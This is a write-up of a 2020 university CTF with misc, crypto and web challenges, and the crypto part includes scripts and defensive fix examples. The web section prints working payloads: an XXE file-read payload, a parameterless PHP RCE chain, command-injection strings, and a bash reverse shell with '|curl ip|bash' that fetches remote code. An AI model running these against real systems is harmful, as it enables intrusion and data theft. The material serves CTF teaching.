
3rd Tsunami Cup (海啸杯) 2020

A writeup of an internal competition at GZMTU (广航). I was one of the problem setters this time, although I set only a single problem.

misc

表白 (Confession)

The PNG's height field has been altered to hide part of the image (the PNG height trick).
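As an added example (not part of the original writeup), the script below reads the IHDR chunk of a PNG, checks its CRC, and shows why a hand-edited height field is detectable: the CRC stored after the chunk no longer matches the chunk contents. The PNG bytes are constructed in the script; the function names are my own.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def png_chunk(ctype, data):
    """Serialise one PNG chunk: length, type, data, CRC-32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_png_header(width, height):
    """Constructed sample: signature plus an IHDR chunk (8-bit RGB); no image data follows."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return PNG_SIGNATURE + png_chunk(b"IHDR", ihdr)


def ihdr_info(png):
    """Return (width, height, crc_ok) read from the IHDR chunk."""
    if png[:8] != PNG_SIGNATURE:
        raise ValueError("not a PNG")
    length, = struct.unpack(">I", png[8:12])
    ctype = png[12:16]
    if ctype != b"IHDR" or length != 13:
        raise ValueError("first chunk is not a valid IHDR")
    data = png[16:16 + length]
    stored_crc, = struct.unpack(">I", png[16 + length:20 + length])
    width, height = struct.unpack(">II", data[:8])
    crc_ok = (zlib.crc32(ctype + data) & 0xFFFFFFFF) == stored_crc
    return width, height, crc_ok


def set_height(png, new_height):
    """Overwrite only the 4 height bytes of IHDR (offset 20..24); the CRC is left stale."""
    return png[:20] + struct.pack(">I", new_height) + png[24:]


def restore_height(png, new_height):
    """Rewrite the height and recompute the IHDR CRC so the file is consistent again."""
    data = bytearray(png[16:29])
    data[4:8] = struct.pack(">I", new_height)
    return PNG_SIGNATURE + png_chunk(b"IHDR", bytes(data)) + png[33:]


if __name__ == "__main__":
    sample = make_png_header(640, 480)
    print(ihdr_info(sample))                      # (640, 480, True)
    print(ihdr_info(set_height(sample, 100)))      # (640, 100, False): CRC mismatch
```

Most viewers still render a PNG with a wrong IHDR CRC, which is why the trick hides content from a casual look, but a CRC check is a cheap first test when an image "looks cut off".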

LSB

Image steganography based on the LSB (least significant bit) principle.

Use Stegsolve's Data Extract to analyse it; download: https://share.weiyun.com/z9PBJjks

Load the image and run Data Extract.

This reveals a PNG file. Click Save Bin at the bottom to save it as a PNG file.

Scan the QR code to get the flag.
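Added example, not from the writeup: a pure-Python illustration of the LSB principle that Stegsolve's Data Extract relies on. The cover bytes and the payload are constructed in the script (the payload starts with a PNG signature, as in the challenge); it writes the payload into bit plane 0, reads the plane back, and carves from the PNG signature onward, which is what the Data Extract + Save Bin step does.

```python
PNG_SIG = b"\x89PNG\r\n\x1a\n"


def lsb_embed(cover, payload):
    """Write payload bits (MSB first) into the least significant bit of successive cover bytes."""
    cover = bytearray(cover)
    bits = [(byte >> (7 - k)) & 1 for byte in payload for k in range(8)]
    if len(bits) > len(cover):
        raise ValueError("cover too small for payload")
    for idx, bit in enumerate(bits):
        cover[idx] = (cover[idx] & 0xFE) | bit   # keep the upper 7 bits, replace bit 0
    return bytes(cover)


def lsb_extract(cover, nbytes):
    """Recover nbytes from bit plane 0 (8 cover bytes per payload byte)."""
    out = bytearray()
    for i in range(nbytes):
        value = 0
        for k in range(8):
            value = (value << 1) | (cover[i * 8 + k] & 1)
        out.append(value)
    return bytes(out)


def carve_png_from_lsb(cover):
    """Dump the whole LSB plane and return the bytes from the first PNG signature on, or None."""
    plane = lsb_extract(cover, len(cover) // 8)
    pos = plane.find(PNG_SIG)
    return None if pos < 0 else plane[pos:]


if __name__ == "__main__":
    # Constructed cover: 1024 sample bytes standing in for pixel data
    cover = bytes(range(256)) * 4
    payload = b"\x00\x00" + PNG_SIG + b"IHDR"   # constructed payload
    stego = lsb_embed(cover, payload)
    print(carve_png_from_lsb(stego)[:12])        # b'\x89PNG\r\n\x1a\nIHDR'
```

Every cover byte changes by at most one unit, which is why LSB embedding is invisible to the eye and why the bit-plane views in Stegsolve are the right place to look.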

老烟枪 (Old Smoker)

Drop it straight into Kali and carve it with binwalk.

The result is a flag written backwards; reverse it to get the correct flag.

你能破解吗 (Can you crack it?)

  • hint: the archive password is g2mtu followed by four digits

The archive-cracking tool ARCHPR can be used here.

First enumerate every candidate password and save the list in the wordlist 1.txt.

Enumeration script:

```python
# Every four-digit suffix 0000..9999: %04d keeps the leading zeros so that
# 0000..0999 are not missed, and range(10000) includes 9999
with open('1.txt', 'w') as f:
    for i in range(10000):
        f.write('g2mtu%04d\n' % i)
```

Then open the tool and choose dictionary mode.

Open the archive, then base64-decode the contents to get the flag.

disk0

Mount it with:

```shell
mount disk0 <mount directory>
```

Inside there is a text file and an encrypted zip. The text says the password was deleted, so recover it from disk0 with the forensic tool extundelete:

```shell
extundelete disk0 --restore-all
```

This produces a RECOVERED_FILES folder; the file named file inside it is the zip password.

Unzip, then fix the image height to get the flag.

Crypto

凯撒将军 (General Caesar)

Caesar cipher

Encryption algorithm: each character of the given flag is shifted forward by 3 positions and the shifted string is base64-encoded (as the scripts show, the base64 encoding is applied first and the shift second, and decryption reverses that order).

Encryption script:

```python
import base64

flag = "flag{crypto_is_hxb_so_eAsy0}"

# base64-encode the flag first ...
result = base64.b64encode(flag.encode()).decode()
print(result)

# ... then shift every character forward by 3, wrapping within 7-bit ASCII
encode_flag = ""
for i in result:
    encode_flag += chr((ord(i) + 3) % 128)

print(encode_flag)
```

Decryption script:

```python
import base64

result = "]p{k]6wmfqozgJ<id[QidKkl[6Qy[5YEf6nziT@@"

# undo the shift ...
flag = ""
for i in result:
    flag += chr(ord(i) - 3)

# ... then base64-decode
print(base64.b64decode(flag).decode())
```

小明家的小菜园 (Xiao Ming's vegetable garden)

Rail fence cipher

Because the number of rails is small, no hint about it is given; use an online rail fence decoder or write a script that brute-forces the number of rails.

Encryption script:

```python
flag = "flag{yo_uget_itzha_lan_good}"

# 28 characters written as 4 rows of 7 (k = 7):
#   flag{yo _uget_i tzha_la n_good}
# the same string in groups of 4:
#   flag {yo_ uget _itz ha_l an_g ood}
# reading the 7 columns top to bottom gives the ciphertext; the first column is "f_tn"
k = 7

encode_flag = ""

for i in range(7):          # column
    for j in range(4):      # row
        encode_flag += flag[j * 7 + i]

print(encode_flag)
```

Decryption script:

```python
encode_flag = "f_tnluz_aghggeao{t_oy_ldoia}"

# brute-force the rail count: try every k and keep the one that yields "flag"
for k in range(1, 29):
    flag = ""
    num = 28 // k
    for i in range(k):
        for j in range(num):
            flag += encode_flag[j * k + i]
    if "flag" in flag:
        print("k:" + str(28 // k) + "\n" + "flag:\n" + flag + "\n")
```

战报 (Battle Report)

Description:

Our army destroyed an enemy secret radio station and captured one ciphertext together with its plaintext, but another ciphertext remains unbroken. You are asked to break the code:

Ciphertext:
jivsyisgmlirgbggvuocevsivnsoevszotfloymivnmozwgitmbyfevtgugvffecgmflgtglimbggvjgmmuocevsivnijofcotgsoevsklgvflgkotjnkimmfejjhohyjifgnbwlyvfgtsiflgtgtmmcijjfeslfjwqvefstoyhmngrgjohgnflgetokvhiffgtvmozmhggulevnghgvngvfozgiuloflgtmocgjivsyisggdhgtfmbgjegrgflifwgitmisoklgvflgkotjnlinxymfzergfofgvcejjeovhgohjgflgwmhoqghgtlihmjivsyisgmbgfkggvflgcmoovizfgtkitnmcivwozflomghgohjgmfitfgnmgffjevsnokvfobguocgzitcgtmivnflgetjivsyisgmfoobguicgcotgmgffjgnivnzgkgtevvycbgtevtgugvfugvfytegmftingevnymfteijemifeovflgngrgjohcgvfozflgvifeovmfifgivnflgmhtginozyvergtmijuochyjmotwgnyuifeovgmhgueijjwsjobijemifeovivnbgffgtuoccyveuifeovmevflghimfzgknguingmijjlirguiymgncivwjivsyisgmfonemihhgitivnnocevivfjivsyisgmmyulimgvsjemlmhivemlivnulevgmgitgevutgimevsjwfiqevsorgtifhtgmgvfflgkotjnlimiboyfjivsyisgmflgnemftebyfeovozflgmgjivsyisgmemlysgjwyvgrgvflgsgvgtijtyjgemflifcejnpovgmlirgtgjifergjwzgkjivsyisgmozfgvmhoqgvbwcivwhgohjgklejglofkgfpovgmlirgjofmozfgvmhoqgvbwmcijjvycbgtmgytohglimovjwitoyvnjivsyisgmflgicgteuimiboyfizteuiivnimeiivnflghiuezeuhgtlihmozkleulhihyivgksyevgiijovgiuuoyvfmzotkgjjorgtflgcgneivvycbgtozmhgiqgtmemcgtgkleulfliflijzflgkotjnmjivsyisgmitgmhoqgvbwzgkgthgohjgflivflifijtginwkgjjorgtozflgfofijozjivsyisgmitgujomgfogdfevufeovkeflovjwizgkgjngtjwmhgiqgtmjgzfheuqiftivnocbymyyevuicgtoovgeslftgcievevsmhgiqgtmuleihivguoevcgdeuojehivihiulgevflgyvefgnmfifgmfkootfltggotkinxesyeviymftijeiovgkefliaygmfeovcitqvovgozflgmgmggcmfolirgcyululivugozmytrerij
Plaintext:
Languages have been coming and going for thousands of years, but in recent times there has been less coming and a lot more going. When the world was still populated by hunter-gatherers,small,tightly knit(联系)groups developed their own patterns of speech independent of each other. Some language experts believe that 10,000 years ago, when the world had just five to ten million people, they spoke perhaps 12, 000 languages between them.Soon afterwards, many of those people started settling down to become farmers, and their languages too became more settled and fewer in number. In recent centuries, trade, industrialisation, the development of the nation-state and the spread of universal compulsory education, especially globalisation and better communications in the past few decades, all have caused many languages to disappear, and dominant languages such as English,Spanish and Chinese are increasingly taking over.At present, the world has about 6, 800 languages. The distribution of these languages is hugely uneven. The general rule is that mild zones have relatively few languages, often spoken by many people, while hot wet zones have lots, often spoken by small numbers. Europe has only around 200 languages; the Americas about 1, 000; Africa 2, 400; and Asia and the Pacific perhaps 3,200, of which Papua New Guinea alone accounts for well over 800.The median number(中位数) of speakers is mere 6,000, which that half the world's languages are spoken by fewer people than that.Already well over 400 of the total of 6, 800 languages are close to extinction (消亡), with only a few elderly speakers left. Pick, at random, Busuu in Cameroon (eight remaining speakers), Chiapaneco in Mexico (150), Lipan Apache in the United States (two or three) or Wadjigu in Australia (one, with a question-mark): none of these seems to have much chance of survival

Ciphertext to decrypt:

```text
givfome
```

Solution

Letter-frequency statistics give the following mapping (plaintext letter => ciphertext letter):

```text
e => g
a => i
n => v
t => f
o => o
s => m
i => e
r => j
l => t
h => l
u => y
d => s
g => h
p => n
c => u
m => c
f => z
w => k
y => b
v => w
k => r
c => q
p => d
t => p
x => x
j => a
```

  • Encryption script

```python
# Alphabet rotated to start at 'p'; k is the position of a letter in it
table = ['p','q','r','s','t','u','v','w','x','y','z','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o']
s = "eantosi"
m = ""
for i in s:
    i = i.lower()
    if i not in table:
        continue                      # non-letters produce no output
    k = table.index(i)
    l = (19 * k + 18) % 26            # affine step over the rotated alphabet
    m = m + table[l]
print(m)                              # givfome, the ciphertext to decrypt
```

flag

```text
flag{eantosi}
```
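Added example, not the author's script: instead of reading the mapping off frequency counts by hand, the captured plaintext/ciphertext pair can be aligned letter by letter, which both derives the substitution table and checks that it is consistent (a monoalphabetic substitution never maps one plaintext letter to two ciphertext letters). PLAIN_SAMPLE and CIPHER_SAMPLE are the first sentence of the challenge data above and its matching ciphertext prefix; the script then decrypts givfome and tests whether the table fits an affine cipher over the standard alphabet, which it does with a = 19, b = 8 (the same cipher as the rotated-alphabet script above). The function names are my own.

```python
import string
from collections import Counter
from math import gcd

# First sentence of the captured plaintext and the matching prefix of the captured ciphertext
PLAIN_SAMPLE = ("Languages have been coming and going for thousands of years, "
                "but in recent times there has been less coming and a lot more going.")
CIPHER_SAMPLE = ("jivsyisgmlirgbggvuocevsivnsoevszotfloymivnmozwgitmbyfev"
                 "tgugvffecgmflgtglimbggvjgmmuocevsivnijofcotgsoevs")


def letters_only(text):
    """The cipher works on lowercase letters only; spaces and punctuation were dropped."""
    return "".join(ch for ch in text.lower() if ch in string.ascii_lowercase)


def derive_mapping(plain, cipher):
    """Align known plaintext with its ciphertext and record plain -> cipher for every letter seen."""
    p, c = letters_only(plain), letters_only(cipher)
    if len(p) != len(c):
        raise ValueError("plaintext and ciphertext letter counts differ")
    mapping = {}
    for pch, cch in zip(p, c):
        if mapping.setdefault(pch, cch) != cch:
            raise ValueError("not a monoalphabetic substitution: %r -> %r and %r"
                             % (pch, mapping[pch], cch))
    return mapping


def top_frequencies(text, n=3):
    """Most common letters; in the ciphertext the top one is the image of 'e'."""
    return Counter(letters_only(text)).most_common(n)


def decrypt(cipher, mapping):
    """Invert the table; letters never seen in the sample come out as '?'."""
    inverse = {c: p for p, c in mapping.items()}
    return "".join(inverse.get(ch, "?") for ch in cipher)


def fit_affine(mapping):
    """Search a, b with cipher = (a * plain + b) mod 26 over a..z; None if the table is not affine."""
    for a in range(1, 26):
        if gcd(a, 26) != 1:
            continue
        for b in range(26):
            if all((a * (ord(p) - 97) + b) % 26 == ord(c) - 97 for p, c in mapping.items()):
                return a, b
    return None


if __name__ == "__main__":
    table = derive_mapping(PLAIN_SAMPLE, CIPHER_SAMPLE)
    print(top_frequencies(CIPHER_SAMPLE))        # [('g', 14), ('v', 12), ...]
    print(decrypt("givfome", table))             # eantosi
    print(fit_affine(table))                     # (19, 8)
```

The affine fit is the useful check for a defender as well: once (a, b) is known, every letter, including ones absent from the sample, is determined, so the sample only has to contain two letters with an invertible difference, not all 26.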

web

G2mtu学生? (A G2mtu student?)

Challenge source

```php
<?php
setcookie("user", "0", time()+360);
if(@$_SERVER["HTTP_X_FORWARDED_FOR"]!="127.0.0.1"){
    die("u no student in Gzmtu");
}else{
    if($_COOKIE['user']==1){
        echo "flag{welcom_to_GZMTU_56456s4awdawdafafa}";
    }else{
        die("u no admin!");
    }
}
?>
```

Forge the client IP with an X-Forwarded-For: 127.0.0.1 header, then change the cookie to user=1; the authorization check is bypassed and the flag is returned.

Who are you?

Key point

  • XXE (XML external entity) injection

Challenge source

```php
<?php
libxml_disable_entity_loader(false);
$data = @file_get_contents('php://input');
$resp = '';
//$flag='flag{79d10626-d27f-4569-a629-c9606d0378f2}';
if($data != false){
    $dom = new DOMDocument();
    $dom->loadXML($data, LIBXML_NOENT);
    ob_start();
    $res = $dom->textContent;
    $resp = ob_get_contents();
    ob_end_clean();
    if ($res){
        die($res);
    }

}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>welcome</title>
<link rel="stylesheet" href="./style.css">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

</head>
<body class="contactBody">
<div class="wrapper">
<div class="title">


</div>


<form method="post" class="form">
<h1 id="title">请输入姓名</h1>
<br/>
<br/>
<br/>
<input type="text" class="name entry " id="name" name="name" placeholder="Your Name"/>
</form>
<button class="submit entry" onclick="func()">Submit</button>

<div class="shadow"></div>
</div>

</body>
</html>
<script type="text/javascript">
function play() {
    return false;
}
function func() {
    // document.getElementById().value
    var xml = '' +
        '<\?xml version="1.0" encoding="UTF-8"\?>' +
        '<feedback>' +
        '<author>' + document.getElementById('name').value+ '</author>' +
        '</feedback>';
    console.log(xml);
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.onreadystatechange = function () {
        if (xmlhttp.readyState == 4) {
            // console.log(xmlhttp.readyState);
            // console.log(xmlhttp.responseText);
            var res = xmlhttp.responseText;
            document.getElementById('title').textContent = res
        }
    };
    xmlhttp.open("POST", "index.php", true);
    xmlhttp.send(xml);
    return false;
};
</script>
</body>
</html>
```

Solution

XXE external entity injection combined with the php://filter wrapper to read the source:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" >]>

<feedback>
<author>&xxe;</author>
</feedback>
```

Intercept the request and replace the XML body, then base64-decode the response to get the flag.
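As an added example (my own code, not the challenge's), here is what the receiving side should have done with the feedback document: refuse any input that carries a DOCTYPE, since without a DTD there is nowhere to declare an entity, and only then parse it and read the author name. The two sample documents are constructed in the script: the benign one mirrors what the page's form sends, the other is the payload from the writeup above.

```python
import re
import xml.etree.ElementTree as ET

# Any DTD at all is refused: entity declarations (internal or SYSTEM) live only inside a DOCTYPE.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)


def extract_author(xml_bytes):
    """Return the <author> text from a <feedback> document, or None if the input is rejected."""
    if DOCTYPE_RE.search(xml_bytes):
        return None
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        return None
    if root.tag != "feedback":
        return None
    author = root.find("author")
    if author is None or author.text is None:
        return None
    return author.text


# Constructed samples: what the page's form sends, and the XXE payload from the writeup
BENIGN = (b'<?xml version="1.0" encoding="UTF-8"?>'
          b'<feedback><author>alice</author></feedback>')
XXE_PAYLOAD = (b'<?xml version="1.0" encoding="UTF-8"?>'
               b'<!DOCTYPE foo [<!ELEMENT foo ANY>'
               b'<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">]>'
               b'<feedback><author>&xxe;</author></feedback>')

if __name__ == "__main__":
    print(extract_author(BENIGN))        # alice
    print(extract_author(XXE_PAYLOAD))   # None
```

In the PHP source the equivalent fixes are to stop calling libxml_disable_entity_loader(false) and to drop LIBXML_NOENT from loadXML(), so that entity references are neither loaded from disk nor substituted; rejecting DOCTYPE up front is the belt-and-braces version that works regardless of parser defaults.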

无参数RCE (Parameterless RCE)

Challenge source

```php
<?php
//flag in flag.php
$a="";
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {
    if(preg_match("/ses|pos|end|next|name|chdir|var|impolode|tan|tall|sys|eval|var|high|show|read|base|url|print/", $_GET['code'])){
        die("no no no !");
    }
    eval("\$a=".$_GET['code']);
    if(preg_match('/flag/', $a)){
        die("no");
    }
    echo($a);
} else {
    show_source(__FILE__);
}
?>
```

A lot is filtered: the usual array-manipulation functions are banned, session is banned, and show_source and highlight_file for displaying a file are gone as well. Going through the functions that remain, there is the array function array_rand (which returns a random key from an array) together with file_get_contents, and for picking the current directory there is current(localeconv()). Combining them:

```php
file_get_contents(array_rand(array_flip(scandir(current(localeconv())))));
```

But flag is filtered afterwards too, and the flag is in flag.php, so reading it makes the script die. The content has to be encoded; base64 is already filtered, so hex encoding is used instead. Final payload:

```php
bin2hex(file_get_contents(array_rand(array_flip(scandir(current(localeconv()))))));
```

Other files get read as well, because the file is picked at random, so the hex output differs on every request and each one has to be decoded and inspected. Decoding code:

```php
<?php
echo hex2bin("3c3f7068700d0a2f2f666c61677b31353166306361642d376338322d346164312d383230332d3536636333366461393564307d0d0a3f3e");
```

Decoding gives the flag.
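Added example, not part of the writeup: a Python stand-in for the two gates in the challenge source, written to show exactly what the recursive regex enforces. PCRE's (?R) is not available in Python's re module, so the first gate is re-implemented as a small recursive matcher for name( [chain] ), which is all the pattern `[^\W]+\((?R)?\)` accepts; the second gate is the keyword blocklist copied from the source (including its impolode typo). Function names and the nest() helper are my own.

```python
import re

# Keyword blocklist exactly as in the challenge source
BLOCKLIST = re.compile(r"ses|pos|end|next|name|chdir|var|impolode|tan|tall|sys|eval|var|high|show|read|base|url|print")
IDENT = re.compile(r"\w+")   # PCRE's [^\W]+ is the same class as \w+


def match_chain(code, pos):
    """Return the end index of a match of  name '(' [chain] ')'  starting at pos, or None.

    This is the recursive pattern /[^\W]+\((?R)?\)/: an identifier, an opening
    parenthesis, optionally one more such call, and the closing parenthesis.
    No arguments, strings or operators can appear anywhere inside.
    """
    m = IDENT.match(code, pos)
    if not m or code[m.end():m.end() + 1] != "(":
        return None
    after = m.end() + 1
    inner = match_chain(code, after)
    if inner is not None:
        after = inner
    return after + 1 if code[after:after + 1] == ")" else None


def strip_call_chains(code):
    """Python equivalent of preg_replace(pattern, '', code): delete every match, keep the rest."""
    out, pos = [], 0
    while pos < len(code):
        end = match_chain(code, pos)
        if end is None:
            out.append(code[pos])
            pos += 1
        else:
            pos = end
    return "".join(out)


def gate(code):
    """Apply both checks the challenge runs before eval(); returns a short verdict string."""
    if strip_call_chains(code) != ";":
        return "rejected: not a bare chain of zero-argument calls"
    if BLOCKLIST.search(code):
        return "rejected: blocked keyword"
    return "accepted"


def nest(names):
    """Helper that builds a(b(c())) from ['a', 'b', 'c'], so parentheses are always balanced."""
    return "".join(n + "(" for n in names) + ")" * len(names)


PAYLOAD = nest(["bin2hex", "file_get_contents", "array_rand", "array_flip",
                "scandir", "current", "localeconv"]) + ";"

if __name__ == "__main__":
    print(gate(PAYLOAD))                              # accepted
    print(gate("system('id');"))                      # rejected: string argument breaks the chain
    print(gate(nest(["readfile", "current", "localeconv"]) + ";"))   # rejected: blocked keyword
```

The matcher makes the weakness of this kind of filter visible: the syntactic gate says nothing about which functions are called, so the security rests entirely on the blocklist, and a blocklist of substrings is only as complete as the author's memory of PHP's function table.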

神奇的输入框 (The magic input box)

This challenge is a ping command whose output is never echoed back (blind command injection).

Challenge source

```php
<?php
error_reporting(0);
header("Content-Type: text/html;charset=utf-8");
if( isset( $_POST['submit'] ) ) {
    // Get input
    $target = $_REQUEST['site'];
    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping -c 4 ' . $target );
    }
}
?>
```

  • Approach 1

Use > to write the output of the command we want to run into a file:

```text
127.0.0.1|ls > 1.txt
```

Visit 1.txt and find flagggg.php:

```text
127.0.0.1|cat flagggg.php> 1.txt
```

Or run the command with backticks:

```text
`cat flagggg.php> 1.txt`
```

This gives the flag.

  • Approach 2

Get a reverse shell directly.

Listen on port 1234 on a VPS:

```shell
nc -lvp 1234
```

Write the bash reverse-shell line into /var/www/html on the VPS:

```shell
bash -i >& /dev/tcp/ip/1234 0>&1
```

Then go back to the input box and enter:

```text
|curl ip|bash
```

Tip: because of the Docker target's environment, writing a shell may not be possible, and DNSlog cannot be used to exfiltrate data either.
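As an added example (my own code, not the challenge's), this is the shape the ping handler should have had: the target is validated as an IP literal or a DNS hostname, and the command is executed as an argument list without a shell, so the shell metacharacters the two approaches above depend on never reach an interpreter. The injection strings used in the test are the ones from this section; the function names are my own.

```python
import ipaddress
import re
import subprocess
import sys

# RFC 1123 style hostname: labels of 1..63 alphanumerics/hyphens, no leading or trailing hyphen
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def validate_target(target):
    """Accept an IPv4/IPv6 literal or a hostname; raise ValueError for anything else."""
    target = target.strip()
    try:
        return str(ipaddress.ip_address(target))   # normalises the literal as a bonus
    except ValueError:
        pass
    if HOSTNAME_RE.match(target):
        return target
    raise ValueError("invalid target: %r" % target)


def ping_argv(target):
    """Build the argv list for ping: count flag differs between Windows (-n) and *nix (-c)."""
    host = validate_target(target)
    count_flag = "-n" if sys.platform.startswith("win") else "-c"
    # The validated host can never start with '-', so it cannot be mistaken for an option.
    return ["ping", count_flag, "4", host]


def run_ping(target, timeout=30):
    """Run ping without a shell; the input is passed as one argv element, never parsed by sh."""
    result = subprocess.run(ping_argv(target), capture_output=True, text=True, timeout=timeout)
    return result.stdout


if __name__ == "__main__":
    print(ping_argv("127.0.0.1"))          # ['ping', '-c', '4', '127.0.0.1'] on *nix
    for bad in ["127.0.0.1|ls > 1.txt", "`cat flagggg.php> 1.txt`", "|curl ip|bash"]:
        try:
            ping_argv(bad)
        except ValueError as e:
            print("rejected:", e)
```

The allow-list validation is what actually closes the hole; the argv form is the second layer that would hold even if the validation regex had a gap.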

CMS

Log in to the admin panel with the weak credentials admin/admin8888.

  • Approach 1

File inclusion vulnerability.

Insert PHP code.

Edit a page.

Then click "About us" on the front end.

Open it to get the flag.

  • Other approaches

Search for xiaocms vulnerabilities; ready-made getshell methods exist.